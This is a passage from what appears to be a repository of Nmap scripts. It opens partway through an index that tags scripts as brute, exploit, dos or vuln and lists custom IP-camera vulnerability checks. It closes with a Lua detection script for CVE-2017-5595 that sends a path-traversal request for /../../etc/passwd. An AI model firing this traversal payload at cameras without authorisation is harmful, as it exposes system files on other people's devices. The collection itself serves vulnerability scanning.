"iscsi-brute.nse", categories = { "brute", "intrusive", } } 323 | Entry { filename = "iscsi-info.nse", categories = { "default", "discovery", "safe", } } 324 | Entry { filename = "isns-info.nse", categories = { "discovery", "safe", } } 325 | Entry { filename = "jdwp-exec.nse", categories = { "exploit", "intrusive", } } 326 | Entry { filename = "jdwp-info.nse", categories = { "default", "discovery", "safe", } } 327 | Entry { filename = "jdwp-inject.nse", categories = { "exploit", "intrusive", } } 328 | Entry { filename = "jdwp-version.nse", categories = { "version", } } 329 | Entry { filename = "knx-gateway-discover.nse", categories = { "broadcast", "discovery", "safe", } } 330 | Entry { filename = "knx-gateway-info.nse", categories = { "default", "discovery", "safe", } } 331 | Entry { filename = "krb5-enum-users.nse", categories = { "auth", "intrusive", } } 332 | Entry { filename = "ldap-brute.nse", categories = { "brute", "intrusive", } } 333 | Entry { filename = "ldap-novell-getpass.nse", categories = { "discovery", "safe", } } 334 | Entry { filename = "ldap-rootdse.nse", categories = { "discovery", "safe", } } 335 | Entry { filename = "ldap-search.nse", categories = { "discovery", "safe", } } 336 | Entry { filename = "lexmark-config.nse", categories = { "discovery", "safe", } } 337 | Entry { filename = "llmnr-resolve.nse", categories = { "broadcast", "discovery", "safe", } } 338 | Entry { filename = "lltd-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 339 | Entry { filename = "lu-enum.nse", categories = { "brute", "intrusive", } } 340 | Entry { filename = "maxdb-info.nse", categories = { "default", "safe", "version", } } 341 | Entry { filename = "mcafee-epo-agent.nse", categories = { "safe", "version", } } 342 | Entry { filename = "membase-brute.nse", categories = { "brute", "intrusive", } } 343 | Entry { filename = "membase-http-info.nse", categories = { "discovery", "safe", } } 344 | Entry { filename = "memcached-info.nse", categories = { "discovery", "safe", } } 345 | Entry { filename = "metasploit-info.nse", categories = { "intrusive", "safe", } } 346 | Entry { filename = "metasploit-msgrpc-brute.nse", categories = { "brute", "intrusive", } } 347 | Entry { filename = "metasploit-xmlrpc-brute.nse", categories = { "brute", "intrusive", } } 348 | Entry { filename = "mikrotik-routeros-brute.nse", categories = { "brute", "intrusive", } } 349 | Entry { filename = "mmouse-brute.nse", categories = { "brute", "intrusive", } } 350 | Entry { filename = "mmouse-exec.nse", categories = { "intrusive", } } 351 | Entry { filename = "modbus-discover.nse", categories = { "discovery", "intrusive", } } 352 | Entry { filename = "mongodb-brute.nse", categories = { "brute", "intrusive", } } 353 | Entry { filename = "mongodb-databases.nse", categories = { "default", "discovery", "safe", } } 354 | Entry { filename = "mongodb-info.nse", categories = { "default", "discovery", "safe", } } 355 | Entry { filename = "mqtt-subscribe.nse", categories = { "discovery", "safe", "version", } } 356 | Entry { filename = "mrinfo.nse", categories = { "broadcast", "discovery", "safe", } } 357 | Entry { filename = "ms-sql-brute.nse", categories = { "brute", "intrusive", } } 358 | Entry { filename = "ms-sql-config.nse", categories = { "discovery", "safe", } } 359 | Entry { filename = "ms-sql-dac.nse", categories = { "discovery", "safe", } } 360 | Entry { filename = "ms-sql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } } 361 | Entry { filename = "ms-sql-empty-password.nse", categories = { "auth", "intrusive", } } 362 | Entry { filename = "ms-sql-hasdbaccess.nse", categories = { "auth", "discovery", "safe", } } 363 | Entry { filename = "ms-sql-info.nse", categories = { "default", "discovery", "safe", } } 364 | Entry { filename = "ms-sql-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 365 | Entry { filename = "ms-sql-query.nse", categories = { "discovery", "safe", } } 366 | Entry { filename = "ms-sql-tables.nse", categories = { "discovery", "safe", } } 367 | Entry { filename = "ms-sql-xp-cmdshell.nse", categories = { "intrusive", } } 368 | Entry { filename = "msrpc-enum.nse", categories = { "discovery", "safe", } } 369 | Entry { filename = "mtrace.nse", categories = { "broadcast", "discovery", "safe", } } 370 | Entry { filename = "murmur-version.nse", categories = { "version", } } 371 | Entry { filename = "mysql-audit.nse", categories = { "discovery", "safe", } } 372 | Entry { filename = "mysql-brute.nse", categories = { "brute", "intrusive", } } 373 | Entry { filename = "mysql-databases.nse", categories = { "discovery", "intrusive", } } 374 | Entry { filename = "mysql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } } 375 | Entry { filename = "mysql-empty-password.nse", categories = { "auth", "intrusive", } } 376 | Entry { filename = "mysql-enum.nse", categories = { "brute", "intrusive", } } 377 | Entry { filename = "mysql-info.nse", categories = { "default", "discovery", "safe", } } 378 | Entry { filename = "mysql-query.nse", categories = { "auth", "discovery", "safe", } } 379 | Entry { filename = "mysql-users.nse", categories = { "auth", "intrusive", } } 380 | Entry { filename = "mysql-variables.nse", categories = { "discovery", "intrusive", } } 381 | Entry { filename = "mysql-vuln-cve2012-2122.nse", categories = { "discovery", "intrusive", "vuln", } } 382 | Entry { filename = "nat-pmp-info.nse", categories = { "default", "discovery", "safe", } } 383 | Entry { filename = "nat-pmp-mapport.nse", categories = { "discovery", "safe", } } 384 | Entry { filename = "nbd-info.nse", categories = { "discovery", "intrusive", } } 385 | Entry { filename = "nbns-interfaces.nse", categories = { "default", "discovery", "safe", } } 386 | Entry { filename = "nbstat.nse", categories = { "default", "discovery", "safe", } } 387 | Entry { filename = "ncp-enum-users.nse", categories = { "auth", "safe", } } 388 | Entry { filename = "ncp-serverinfo.nse", categories = { "default", "discovery", "safe", } } 389 | Entry { filename = "ndmp-fs-info.nse", categories = { "discovery", "safe", } } 390 | Entry { filename = "ndmp-version.nse", categories = { "version", } } 391 | Entry { filename = "nessus-brute.nse", categories = { "brute", "intrusive", } } 392 | Entry { filename = "nessus-xmlrpc-brute.nse", categories = { "brute", "intrusive", } } 393 | Entry { filename = "netbus-auth-bypass.nse", categories = { "auth", "safe", "vuln", } } 394 | Entry { filename = "netbus-brute.nse", categories = { "brute", "intrusive", } } 395 | Entry { filename = "netbus-info.nse", categories = { "default", "discovery", "safe", } } 396 | Entry { filename = "netbus-version.nse", categories = { "version", } } 397 | Entry { filename = "nexpose-brute.nse", categories = { "brute", "intrusive", } } 398 | Entry { filename = "nfs-ls.nse", categories = { "discovery", "safe", } } 399 | Entry { filename = "nfs-showmount.nse", categories = { "discovery", "safe", } } 400 | Entry { filename = "nfs-statfs.nse", categories = { "discovery", "safe", } } 401 | Entry { filename = "nje-node-brute.nse", categories = { "brute", "intrusive", } } 402 | Entry { filename = "nje-pass-brute.nse", categories = { "brute", "intrusive", } } 403 | Entry { filename = "nntp-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 404 | Entry { filename = "nping-brute.nse", categories = { "brute", "intrusive", } } 405 | Entry { filename = "nrpe-enum.nse", categories = { "discovery", "intrusive", } } 406 | Entry { filename = "ntp-info.nse", categories = { "default", "discovery", "safe", } } 407 | Entry { filename = "ntp-monlist.nse", categories = { "discovery", "intrusive", } } 408 | Entry { filename = "omp2-brute.nse", categories = { "brute", "intrusive", } } 409 | Entry { filename = "omp2-enum-targets.nse", categories = { "discovery", "safe", } } 410 | Entry { filename = "omron-info.nse", categories = { "discovery", "version", } } 411 | Entry { filename = "openflow-info.nse", categories = { "default", "safe", } } 412 | Entry { filename = "openlookup-info.nse", categories = { "default", "discovery", "safe", "version", } } 413 | Entry { filename = "openvas-otp-brute.nse", categories = { "brute", "intrusive", } } 414 | Entry { filename = "openwebnet-discovery.nse", categories = { "discovery", "safe", } } 415 | Entry { filename = "oracle-brute-stealth.nse", categories = { "brute", "intrusive", } } 416 | Entry { filename = "oracle-brute.nse", categories = { "brute", "intrusive", } } 417 | Entry { filename = "oracle-enum-users.nse", categories = { "auth", "intrusive", } } 418 | Entry { filename = "oracle-sid-brute.nse", categories = { "brute", "intrusive", } } 419 | Entry { filename = "oracle-tns-version.nse", categories = { "safe", "version", } } 420 | Entry { filename = "ovs-agent-version.nse", categories = { "version", } } 421 | Entry { filename = "p2p-conficker.nse", categories = { "default", "safe", } } 422 | Entry { filename = "path-mtu.nse", categories = { "discovery", "safe", } } 423 | Entry { filename = "pcanywhere-brute.nse", categories = { "brute", "intrusive", } } 424 | Entry { filename = "pcworx-info.nse", categories = { "discovery", } } 425 | Entry { filename = "pgsql-brute.nse", categories = { "brute", "intrusive", } } 426 | Entry { filename = "pjl-ready-message.nse", categories = { "intrusive", } } 427 | Entry { filename = "pop3-brute.nse", categories = { "brute", "intrusive", } } 428 | Entry { filename = "pop3-capabilities.nse", categories = { "default", "discovery", "safe", } } 429 | Entry { filename = "pop3-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 430 | Entry { filename = "port-states.nse", categories = { "safe", } } 431 | Entry { filename = "pptp-version.nse", categories = { "version", } } 432 | Entry { filename = "puppet-naivesigning.nse", categories = { "intrusive", "vuln", } } 433 | Entry { filename = "qconn-exec.nse", categories = { "exploit", "intrusive", "vuln", } } 434 | Entry { filename = "qscan.nse", categories = { "discovery", "safe", } } 435 | Entry { filename = "quake1-info.nse", categories = { "default", "discovery", "safe", "version", } } 436 | Entry { filename = "quake3-info.nse", categories = { "default", "discovery", "safe", "version", } } 437 | Entry { filename = "quake3-master-getservers.nse", categories = { "default", "discovery", "safe", } } 438 | Entry { filename = "rdp-enum-encryption.nse", categories = { "discovery", "safe", } } 439 | Entry { filename = "rdp-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 440 | Entry { filename = "rdp-vuln-ms12-020.nse", categories = { "intrusive", "vuln", } } 441 | Entry { filename = "realvnc-auth-bypass.nse", categories = { "auth", "safe", "vuln", } } 442 | Entry { filename = "redis-brute.nse", categories = { "brute", "intrusive", } } 443 | Entry { filename = "redis-info.nse", categories = { "discovery", "safe", } } 444 | Entry { filename = "resolveall.nse", categories = { "discovery", "safe", } } 445 | Entry { filename = "reverse-index.nse", categories = { "safe", } } 446 | Entry { filename = "rexec-brute.nse", categories = { "brute", "intrusive", } } 447 | Entry { filename = "rfc868-time.nse", categories = { "discovery", "safe", "version", } } 448 | Entry { filename = "riak-http-info.nse", categories = { "discovery", "safe", } } 449 | Entry { filename = "rlogin-brute.nse", categories = { "brute", "intrusive", } } 450 | Entry { filename = "rmi-dumpregistry.nse", categories = { "default", "discovery", "safe", } } 451 | Entry { filename = "rmi-vuln-classloader.nse", categories = { "intrusive", "vuln", } } 452 | Entry { filename = "rpc-grind.nse", categories = { "version", } } 453 | Entry { filename = "rpcap-brute.nse", categories = { "brute", "intrusive", } } 454 | Entry { filename = "rpcap-info.nse", categories = { "discovery", "safe", } } 455 | Entry { filename = "rpcinfo.nse", categories = { "default", "discovery", "safe", "version", } } 456 | Entry { filename = "rsa-vuln-roca.nse", categories = { "safe", "vuln", } } 457 | Entry { filename = "rsync-brute.nse", categories = { "brute", "intrusive", } } 458 | Entry { filename = "rsync-list-modules.nse", categories = { "discovery", "safe", } } 459 | Entry { filename = "rtsp-methods.nse", categories = { "default", "safe", } } 460 | Entry { filename = "rtsp-url-brute.nse", categories = { "brute", "intrusive", } } 461 | Entry { filename = "rusers.nse", categories = { "discovery", "safe", } } 462 | Entry { filename = "s7-info.nse", categories = { "discovery", "version", } } 463 | Entry { filename = "samba-vuln-cve-2012-1182.nse", categories = { "intrusive", "vuln", } } 464 | Entry { filename = "servicetags.nse", categories = { "default", "discovery", "safe", } } 465 | Entry { filename = "shodan-api.nse", categories = { "discovery", "external", "safe", } } 466 | Entry { filename = "sip-brute.nse", categories = { "brute", "intrusive", } } 467 | Entry { filename = "sip-call-spoof.nse", categories = { "discovery", "intrusive", } } 468 | Entry { filename = "sip-enum-users.nse", categories = { "auth", "intrusive", } } 469 | Entry { filename = "sip-methods.nse", categories = { "default", "discovery", "safe", } } 470 | Entry { filename = "skypev2-version.nse", categories = { "version", } } 471 | Entry { filename = "smb-brute.nse", categories = { "brute", "intrusive", } } 472 | Entry { filename = "smb-double-pulsar-backdoor.nse", categories = { "malware", "safe", "vuln", } } 473 | Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } } 474 | Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } } 475 | Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } } 476 | Entry { filename = "smb-enum-services.nse", categories = { "discovery", "intrusive", "safe", } } 477 | Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } } 478 | Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } } 479 | Entry { filename = "smb-enum-users.nse", categories = { "auth", "intrusive", } } 480 | Entry { filename = "smb-flood.nse", categories = { "dos", "intrusive", } } 481 | Entry { filename = "smb-ls.nse", categories = { "discovery", "safe", } } 482 | Entry { filename = "smb-mbenum.nse", categories = { "discovery", "safe", } } 483 | Entry { filename = "smb-os-discovery.nse", categories = { "default", "discovery", "safe", } } 484 | Entry { filename = "smb-print-text.nse", categories = { "intrusive", } } 485 | Entry { filename = "smb-protocols.nse", categories = { "discovery", "safe", } } 486 | Entry { filename = "smb-psexec.nse", categories = { "intrusive", } } 487 | Entry { filename = "smb-security-mode.nse", categories = { "default", "discovery", "safe", } } 488 | Entry { filename = "smb-server-stats.nse", categories = { "discovery", "intrusive", } } 489 | Entry { filename = "smb-system-info.nse", categories = { "discovery", "intrusive", } } 490 | Entry { filename = "smb-vuln-conficker.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 491 | Entry { filename = "smb-vuln-cve-2017-7494.nse", categories = { "intrusive", "vuln", } } 492 | Entry { filename = "smb-vuln-cve2009-3103.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 493 | Entry { filename = "smb-vuln-ms06-025.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 494 | Entry { filename = "smb-vuln-ms07-029.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 495 | Entry { filename = "smb-vuln-ms08-067.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 496 | Entry { filename = "smb-vuln-ms10-054.nse", categories = { "dos", "intrusive", "vuln", } } 497 | Entry { filename = "smb-vuln-ms10-061.nse", categories = { "intrusive", "vuln", } } 498 | Entry { filename = "smb-vuln-ms17-010.nse", categories = { "safe", "vuln", } } 499 | Entry { filename = "smb-vuln-regsvc-dos.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 500 | Entry { filename = "smb-vuln-webexec.nse", categories = { "intrusive", "vuln", } } 501 | Entry { filename = "smb-webexec-exploit.nse", categories = { "exploit", "intrusive", } } 502 | Entry { filename = "smb2-capabilities.nse", categories = { "discovery", "safe", } } 503 | Entry { filename = "smb2-security-mode.nse", categories = { "default", "discovery", "safe", } } 504 | Entry { filename = "smb2-time.nse", categories = { "default", "discovery", "safe", } } 505 | Entry { filename = "smb2-vuln-uptime.nse", categories = { "safe", "vuln", } } 506 | Entry { filename = "smtp-brute.nse", categories = { "brute", "intrusive", } } 507 | Entry { filename = "smtp-commands.nse", categories = { "default", "discovery", "safe", } } 508 | Entry { filename = "smtp-enum-users.nse", categories = { "auth", "external", "intrusive", } } 509 | Entry { filename = "smtp-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 510 | Entry { filename = "smtp-open-relay.nse", categories = { "discovery", "external", "intrusive", } } 511 | Entry { filename = "smtp-strangeport.nse", categories = { "malware", "safe", } } 512 | Entry { filename = "smtp-vuln-cve2010-4344.nse", categories = { "exploit", "intrusive", "vuln", } } 513 | Entry { filename = "smtp-vuln-cve2011-1720.nse", categories = { "intrusive", "vuln", } } 514 | Entry { filename = "smtp-vuln-cve2011-1764.nse", categories = { "intrusive", "vuln", } } 515 | Entry { filename = "sniffer-detect.nse", categories = { "discovery", "intrusive", } } 516 | Entry { filename = "snmp-brute.nse", categories = { "brute", "intrusive", } } 517 | Entry { filename = "snmp-hh3c-logins.nse", categories = { "default", "discovery", "safe", } } 518 | Entry { filename = "snmp-info.nse", categories = { "default", "safe", "version", } } 519 | Entry { filename = "snmp-interfaces.nse", categories = { "default", "discovery", "safe", } } 520 | Entry { filename = "snmp-ios-config.nse", categories = { "intrusive", } } 521 | Entry { filename = "snmp-netstat.nse", categories = { "default", "discovery", "safe", } } 522 | Entry { filename = "snmp-processes.nse", categories = { "default", "discovery", "safe", } } 523 | Entry { filename = "snmp-sysdescr.nse", categories = { "default", "discovery", "safe", } } 524 | Entry { filename = "snmp-win32-services.nse", categories = { "default", "discovery", "safe", } } 525 | Entry { filename = "snmp-win32-shares.nse", categories = { "default", "discovery", "safe", } } 526 | Entry { filename = "snmp-win32-software.nse", categories = { "default", "discovery", "safe", } } 527 | Entry { filename = "snmp-win32-users.nse", categories = { "auth", "default", "safe", } } 528 | Entry { filename = "socks-auth-info.nse", categories = { "default", "discovery", "safe", } } 529 | Entry { filename = "socks-brute.nse", categories = { "brute", "intrusive", } } 530 | Entry { filename = "socks-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } } 531 | Entry { filename = "ssh-auth-methods.nse", categories = { "auth", "intrusive", } } 532 | Entry { filename = "ssh-brute.nse", categories = { "brute", "intrusive", } } 533 | Entry { filename = "ssh-hostkey.nse", categories = { "default", "discovery", "safe", } } 534 | Entry { filename = "ssh-publickey-acceptance.nse", categories = { "auth", "intrusive", } } 535 | Entry { filename = "ssh-run.nse", categories = { "intrusive", } } 536 | Entry { filename = "ssh2-enum-algos.nse", categories = { "discovery", "safe", } } 537 | Entry { filename = "sshv1.nse", categories = { "default", "safe", } } 538 | Entry { filename = "ssl-ccs-injection.nse", categories = { "safe", "vuln", } } 539 | Entry { filename = "ssl-cert-intaddr.nse", categories = { "discovery", "safe", "vuln", } } 540 | Entry { filename = "ssl-cert.nse", categories = { "default", "discovery", "safe", } } 541 | Entry { filename = "ssl-date.nse", categories = { "default", "discovery", "safe", } } 542 | Entry { filename = "ssl-dh-params.nse", categories = { "safe", "vuln", } } 543 | Entry { filename = "ssl-enum-ciphers.nse", categories = { "discovery", "intrusive", } } 544 | Entry { filename = "ssl-heartbleed.nse", categories = { "safe", "vuln", } } 545 | Entry { filename = "ssl-known-key.nse", categories = { "default", "discovery", "safe", "vuln", } } 546 | Entry { filename = "ssl-poodle.nse", categories = { "safe", "vuln", } } 547 | Entry { filename = "sslv2-drown.nse", categories = { "intrusive", "vuln", } } 548 | Entry { filename = "sslv2.nse", categories = { "default", "safe", } } 549 | Entry { filename = "sstp-discover.nse", categories = { "default", "discovery", "safe", } } 550 | Entry { filename = "stun-info.nse", categories = { "discovery", "safe", } } 551 | Entry { filename = "stun-version.nse", categories = { "version", } } 552 | Entry { filename = "stuxnet-detect.nse", categories = { "discovery", "intrusive", } } 553 | Entry { filename = "supermicro-ipmi-conf.nse", categories = { "exploit", "vuln", } } 554 | Entry { filename = "svn-brute.nse", categories = { "brute", "intrusive", } } 555 | Entry { filename = "targets-asn.nse", categories = { "discovery", "external", "safe", } } 556 | Entry { filename = "targets-ipv6-map4to6.nse", categories = { "discovery", } } 557 | Entry { filename = "targets-ipv6-multicast-echo.nse", categories = { "broadcast", "discovery", } } 558 | Entry { filename = "targets-ipv6-multicast-invalid-dst.nse", categories = { "broadcast", "discovery", } } 559 | Entry { filename = "targets-ipv6-multicast-mld.nse", categories = { "broadcast", "discovery", } } 560 | Entry { filename = "targets-ipv6-multicast-slaac.nse", categories = { "broadcast", "discovery", } } 561 | Entry { filename = "targets-ipv6-wordlist.nse", categories = { "discovery", } } 562 | Entry { filename = "targets-sniffer.nse", categories = { "broadcast", "discovery", "safe", } } 563 | Entry { filename = "targets-traceroute.nse", categories = { "discovery", "safe", } } 564 | Entry { filename = "targets-xml.nse", categories = { "safe", } } 565 | Entry { filename = "teamspeak2-version.nse", categories = { "version", } } 566 | Entry { filename = "telnet-brute.nse", categories = { "brute", "intrusive", } } 567 | Entry { filename = "telnet-encryption.nse", categories = { "discovery", "safe", } } 568 | Entry { filename = "telnet-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 569 | Entry { filename = "tftp-enum.nse", categories = { "discovery", "intrusive", } } 570 | Entry { filename = "tls-alpn.nse", categories = { "default", "discovery", "safe", } } 571 | Entry { filename = "tls-nextprotoneg.nse", categories = { "default", "discovery", "safe", } } 572 | Entry { filename = "tls-ticketbleed.nse", categories = { "safe", "vuln", } } 573 | Entry { filename = "tn3270-screen.nse", categories = { "discovery", "safe", } } 574 | Entry { filename = "tor-consensus-checker.nse", categories = { "external", "safe", } } 575 | Entry { filename = "traceroute-geolocation.nse", categories = { "discovery", "external", "safe", } } 576 | Entry { filename = "tso-brute.nse", categories = { "intrusive", } } 577 | Entry { filename = "tso-enum.nse", categories = { "brute", "intrusive", } } 578 | Entry { filename = "ubiquiti-discovery.nse", categories = { "default", "discovery", "safe", "version", } } 579 | Entry { filename = "unittest.nse", categories = { "safe", } } 580 | Entry { filename = "unusual-port.nse", categories = { "safe", } } 581 | Entry { filename = "upnp-info.nse", categories = { "default", "discovery", "safe", } } 582 | Entry { filename = "uptime-agent-info.nse", categories = { "default", "safe", } } 583 | Entry { filename = "url-snarf.nse", categories = { "safe", } } 584 | Entry { filename = "ventrilo-info.nse", categories = { "default", "discovery", "safe", "version", } } 585 | Entry { filename = "versant-info.nse", categories = { "discovery", "safe", } } 586 | Entry { filename = "vmauthd-brute.nse", categories = { "brute", "intrusive", } } 587 | Entry { filename = "vmware-version.nse", categories = { "discovery", "safe", "version", } } 588 | Entry { filename = "vnc-brute.nse", categories = { "brute", "intrusive", } } 589 | Entry { filename = "vnc-info.nse", categories = { "default", "discovery", "safe", } } 590 | Entry { filename = "vnc-title.nse", categories = { "discovery", "intrusive", } } 591 | Entry { filename = "voldemort-info.nse", categories = { "discovery", "safe", } } 592 | Entry { filename = "vtam-enum.nse", categories = { "brute", "intrusive", } } 593 | Entry { filename = "vulners.nse", categories = { "external", "safe", "vuln", } } 594 | Entry { filename = "vuze-dht-info.nse", categories = { "discovery", "safe", } } 595 | Entry { filename = "wdb-version.nse", categories = { "default", "discovery", "safe", "version", "vuln", } } 596 | Entry { filename = "weblogic-t3-info.nse", categories = { "default", "discovery", "safe", "version", } } 597 | Entry { filename = "whois-domain.nse", categories = { "discovery", "external", "safe", } } 598 | Entry { filename = "whois-ip.nse", categories = { "discovery", "external", "safe", } } 599 | Entry { filename = "wsdd-discover.nse", categories = { "default", "discovery", "safe", } } 600 | Entry { filename = "x11-access.nse", categories = { "auth", "default", "safe", } } 601 | Entry { filename = "xdmcp-discover.nse", categories = { "discovery", "safe", } } 602 | Entry { filename = "xmlrpc-methods.nse", categories = { "default", "discovery", "safe", } } 603 | Entry { filename = "xmpp-brute.nse", categories = { "brute", "intrusive", } } 604 | Entry { filename = "xmpp-info.nse", categories = { "default", "discovery", "safe", "version", } } 605 | Entry { filename = "cam_directorytraveral_03.nse", categories = { "CAM", "cam_directorytraveral_03", "vuln_detect"} } 606 | Entry { filename = "cnvd-2021-14544.nse", categories = { "hikvision", "cnvd-2021-14544", "vuln_detect" } } 607 | Entry { filename = "hikvision_7088_post.nse", categories = { "hikvision", "hikvision_7088_post", "vuln_detect"} } 608 | Entry { filename = "hikvision_backdoor_05.nse", categories = { "hikvision", "hikvision_backdoor_05", "vuln_detect"} } 609 | Entry { filename = "hikvision_information_leakage.nse", categories = { "hikvision", "hikvision_information_leakage", "vuln_detect"} } 610 | Entry { filename = "hikvision_lfi_06.nse", categories = { "hikvision", "hikvision_lfi_06", "vuln_detect"} } 611 | Entry { filename = "dahua_backdoor.nse", categories = { "dahua", "dahua_backdoor", "vuln_detect"} } 612 | Entry { filename = "dahua_unauth_02.nse", categories = { "dahua", "dahua_unauth_02", "vuln_detect"} } 613 | Entry { filename = "goahead_rce_01.nse", categories = { "goahead", "goahead_rce_01", "vuln_detect"} } 614 | Entry { filename = "lg_infoleak_v1.nse", categories = { "LG", "lg_infoleak_v1", "vuln_detect"} } 615 | Entry { filename = "lg_lfi.nse", categories = { "LG", "lg_lfi", "vuln_detect"} } 616 | Entry { filename = "credentials_disclosure.nse", categories = { "Novo", "credentials_disclosure", "vuln_detect" } } 617 | Entry { filename = "nuuo_backdoor_06.nse", categories = { "Nuuo", "nuuo_backdoor_06", "vuln_detect"} } 618 | Entry { filename = "RG_UAC_information_leakage.nse", categories = { "ruijie", "RG_UAC_information_leakage", "vuln_detect" } } 619 | Entry { filename = "uniview_dvr_nvr_rce_03.nse", categories = { "uniview", "uniview_dvr_nvr_rce_03", "vuln_detect" } } 620 | Entry { filename = "uniview_infoleak_01.nse", categories = { "uniview", "uniview_infoleak_01", "vuln_detect" } } 621 | Entry { filename = "uniview_rce_02.nse", categories = { "uniview", "uniview_rce_02", "vuln_detect" } } 622 | Entry { filename = "xiong-mai-60001.nse", categories = { "xiongmai", "xiongmai_60001", "vuln_detect" } } 623 | Entry { filename = "gb28181_nodetect.nse", categories = { "GB28181", "GB28181_nodetect", "vuln_detect" } } 624 | Entry { filename = "velotismart_directory_traversal.nse", categories = { "velotismart_directory_traversal", "vuln_detect" } } 625 | Entry { filename = "onvif_post_timecomparion.nse", categories = { "onvif_post_timecomparion", "vuln_detect" } } 626 | Entry { filename = "onvif_anonymouse_access_detect.nse", categories = { "onvif_anonymouse_access_detect", "vuln_detect" } } 627 | -------------------------------------------------------------------------------- /velotismart/velotismart_directory_traversal.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | author = "seaung" 8 | 9 | 10 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 11 | categories = {"vuln_detect", "velotismart_directory_traversal"} 12 | 13 | 14 | description = [[ 15 | CVE:CVE-2017-5595 16 | Desc: VelotiSmart WiFi camera存在目录遍历漏洞,未授权用户可以通过目录 17 | 遍历来查看系统敏感信息,如/etc/passwd 18 | ]] 19 | 20 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 21 | 22 | 23 | action = function(host, port) 24 | local output = stdnse.output_table() 25 | local path = "/../../etc/passwd" 26 | local check_root = "root" 27 | 28 | 29 | local r = http.get(host, port, path) 30 | 31 | if r.status == 200 then 32 | if string.find(r.body, check_root) ~= nil then 33 | output = "Found Vulnerable" 34 | else 35 | output = "Not Vulnerable" 36 | end 37 | else 38 | output = "Not Vulnerable" 39 | end 40 | return output 41 | end 42 | --------------------------------------------------------------------------------